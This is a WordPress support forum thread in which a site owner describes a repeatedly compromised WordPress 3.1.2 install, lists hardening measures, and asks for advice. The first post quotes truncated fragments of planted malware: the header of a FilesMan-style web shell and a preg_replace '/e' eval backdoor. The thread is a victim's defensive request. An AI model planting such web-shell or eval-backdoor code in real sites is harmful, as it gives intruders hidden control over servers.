WordPress.org

Ready to get started?Download WordPress

Forums

Major Security Issues / Under constant attack | *** Help! (7 posts)

  1. FrankRizer
    Member
    Posted 3 years ago #

    I'm at a complete loss at this point.

    Hackers haven been compromising our WP3.1.2 install for the last 5 days around the clock and managed to introduce both "<iframe..>" content in my secure wp-config.php as well as Malware PHP files across several folders.

    I tightened security all over the place, but they still are able to introduce new PHP files across the filesystem regardless off file & folder permissions:

    Some of those Malware files incude content such as:

    <?php
    $auth_pass = "5bd3898279e9024046c38271e135db80";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;

    &

    <?php
    preg_replace("/aoRJfwFgvd1uhhs45xuh1R3y/e", "uOwQScq6H84YA5GeyGYHg04WJ8Pc

    and other stuff. They even modified folder permissions and (!) .htaccess (perm: 440!).

    I thought our system (new install, WordPress 3.1.2) was pretty secure to begin with, here is what else we did:

    * _all_ folders _except_ the Super Cache folder are non writable, mostly 550
    * all of the typical .htaccess (and more) relevant settings are in place, perm = 400
    * no POST without proper site REFERRER
    * capturing other REQUEST TYPES, eg HEAD, TRACE...
    * filtering QUERY_STRINGS
    * wp-config, wp-admin, login are protected (apache login/pw)
    * plus... roughly 60 lines dedicated to filter hack/spam attempts

    * Secured WP via plugins (no version generator / capturing malicious requests)

    * PHP.ini settings
    * safe mode on, register_globals off, allow_url_fopen off etc.

    * Server Quota in place

    * wp-config.php has been replaced with a "dummy" pointing to a secure place
    -> created a new secure folder (500) including a pseudo wp-config.php (400)

    * new,secure wp-config, configured with
    * define('WP_DEBUG', false);
    * NEW $table_prefix

    * Changed all passwords (DB, FTP, WP Logins)

    * Ran a virus and Malware check on our local computers: they're clean

    We're at a loss, any idea what else to look out for? Every other hour we start cleaning infected files afresh...

    Thanks for anything you can think of....

    F.

  2. esmi
    Forum Moderator
    Posted 3 years ago #

    The back door might be someplace else on the server and nothing to do with WordPress at all.

  3. FrankRizer
    Member
    Posted 3 years ago #

    Hi esmi,

    For the last 4 days, the server only had WP installed, even with a "Quota" setting, meaning no scripts running on the domain could have accessed any files outside the domain/respective file system (new owner ID).

    And vice versa, no outside script should've (if that possible with no extra server content) been able to add those files in a file system belonging to another owner.

    Hence, it's got to be coming in through WP.

    Also, the log files show frequent (<5min around the clock!) attempts to run those Malware files such as auth.php, commonn.php, and more recently real, legit files they compromised.

    F.

  4. esmi
    Forum Moderator
    Posted 3 years ago #

  5. FrankRizer
    Member
    Posted 3 years ago #

    Thanks, those are great resources, but except for a few tips (@ottopress) I've seen all of these and followed the guidelines around recovery etc.

    I hate to take away WP functionality, but if it helps I'll do what it takes.

    What are the typical security issues/areas prone to malicious attempts?

    1) Site Search (GET Request?!)
    2) Contact Form (POST)
    3) WP Comments (POST)

    ....any known current issues in those areas?

  6. Moodles
    Member
    Posted 3 years ago #

    I had an iframe attack on a site. From what I read online, the hole was possibly my FTP program (Filezilla). I no longer store the passwords in the program but have my FTP Logon Type as "ask for password."

    Have you changed the FTP (probably also the account password)?

  7. FrankRizer
    Member
    Posted 3 years ago #

    Yes, changed the passwords twice. I'm not storing passwords inside the FTP client (winscp) and I'm using sftp protocol.

    Any links to best practices or sites that explain what to watch out for in plugins/themes (esp. around GET/POST/ajax) that might cause security issues?

Topic Closed

This topic has been closed to new replies.

About this Topic